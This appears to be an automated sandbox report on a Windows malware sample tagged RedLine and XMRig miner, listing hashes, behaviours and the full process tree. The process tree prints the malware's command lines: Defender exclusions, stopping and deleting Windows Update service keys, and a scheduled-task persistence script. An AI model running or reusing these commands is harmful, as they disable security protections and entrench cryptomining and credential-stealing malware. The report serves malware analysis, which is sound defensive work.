C:\Program Files\Windows\WindowsHost
| MD5 | bf41699ea8e7a4ddc8989a616909c05d |
| SHA1 | 1f39ca29bec36d9971fd67a04e48108afa487b39 |
| SHA256 | ef351d1015aeebc0983a645de1e76d10aba040bff485ac82faed27c9445d2fe1 |
| SHA512 | 72e36bd0b99fa346f18589e24e8036811c5d76b3ecb6124428798cc64df1c2b0471934f61046bd8e6776296188e7db4461a8c1f51fec1899916aeafab4ce2634 |
memory/268-131-0x000000013F2B0000-0x0000000140331000-memory.dmp
memory/268-133-0x000000013F2B0000-0x0000000140331000-memory.dmp
memory/908-135-0x000007FEF3840000-0x000007FEF4263000-memory.dmp
memory/908-136-0x000007FEF2CE0000-0x000007FEF383D000-memory.dmp
memory/908-137-0x00000000010D4000-0x00000000010D7000-memory.dmp
memory/908-138-0x00000000010D4000-0x00000000010D7000-memory.dmp
memory/908-139-0x00000000010DB000-0x00000000010FA000-memory.dmp
memory/1600-141-0x0000000000000000-mapping.dmp
memory/1272-140-0x0000000000000000-mapping.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1416-144-0x0000000000000000-mapping.dmp
memory/2000-145-0x0000000000000000-mapping.dmp
memory/1580-146-0x0000000000000000-mapping.dmp
memory/1944-147-0x000007FEF41E0000-0x000007FEF4C03000-memory.dmp
memory/1944-149-0x000007FEF3680000-0x000007FEF41DD000-memory.dmp
memory/1268-148-0x0000000000000000-mapping.dmp
memory/956-150-0x0000000000000000-mapping.dmp
memory/1804-151-0x0000000000000000-mapping.dmp
memory/1944-152-0x00000000011B4000-0x00000000011B7000-memory.dmp
memory/1836-153-0x0000000000000000-mapping.dmp
memory/608-154-0x0000000000000000-mapping.dmp
memory/1656-155-0x0000000000000000-mapping.dmp
memory/848-156-0x0000000000000000-mapping.dmp
memory/796-157-0x0000000000000000-mapping.dmp
memory/1588-158-0x0000000000000000-mapping.dmp
memory/1336-159-0x0000000000000000-mapping.dmp
memory/1944-160-0x00000000011B4000-0x00000000011B7000-memory.dmp
memory/1944-161-0x00000000011BB000-0x00000000011DA000-memory.dmp
memory/336-162-0x00000001400014E0-mapping.dmp
memory/1704-163-0x0000000000000000-mapping.dmp
C:\Program Files\Google\Libs\g.log
| MD5 | 37dd19b2be4fa7635ad6a2f3238c4af1 |
| SHA1 | e5b2c034636b434faee84e82e3bce3a3d3561943 |
| SHA256 | 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07 |
| SHA512 | 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5 |
memory/1532-165-0x00000001407F2720-mapping.dmp
memory/268-167-0x000000013F2B0000-0x0000000140331000-memory.dmp
memory/1532-166-0x00000000000B0000-0x00000000000D0000-memory.dmp
memory/1532-168-0x0000000140000000-0x00000001407F4000-memory.dmp
memory/1532-169-0x00000000003C0000-0x00000000003E0000-memory.dmp
memory/1532-170-0x0000000140000000-0x00000001407F4000-memory.dmp
memory/1532-171-0x00000000003C0000-0x00000000003E0000-memory.dmp
memory/1532-173-0x0000000000810000-0x0000000000830000-memory.dmp
memory/1532-172-0x00000000003C0000-0x00000000003E0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-12 12:16
Reported
2023-01-12 12:18
Platform
win10v2004-20221111-en
Max time kernel
149s
Max time network
146s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHost = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\GooglePrograms\\WindowsHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
| N/A | N/A | C:\Program Files\Windows\WindowsHost | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4328 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 2576 set thread context of 1464 | N/A | C:\Program Files\Windows\WindowsHost | C:\Windows\System32\conhost.exe |
| PID 2576 set thread context of 2216 | N/A | C:\Program Files\Windows\WindowsHost | C:\Windows\System32\svchost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Windows\WindowsHost | C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Windows\WindowsHost | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
| File created | C:\Program Files\Google\Libs\g.log | C:\Windows\System32\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe
"C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig/release
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe
"C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig/renew
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /renew
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qzignfste#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsHost" } Else { "C:\Program Files\Windows\WindowsHost" }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsHost
C:\Program Files\Windows\WindowsHost
"C:\Program Files\Windows\WindowsHost"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nugixlm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsHost' /tr '''C:\Program Files\Windows\WindowsHost''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Windows\WindowsHost') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsHost' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsHost" /t REG_SZ /f /d 'C:\Program Files\Windows\WindowsHost' }
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe yadsrbyzjoct
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\svchost.exe
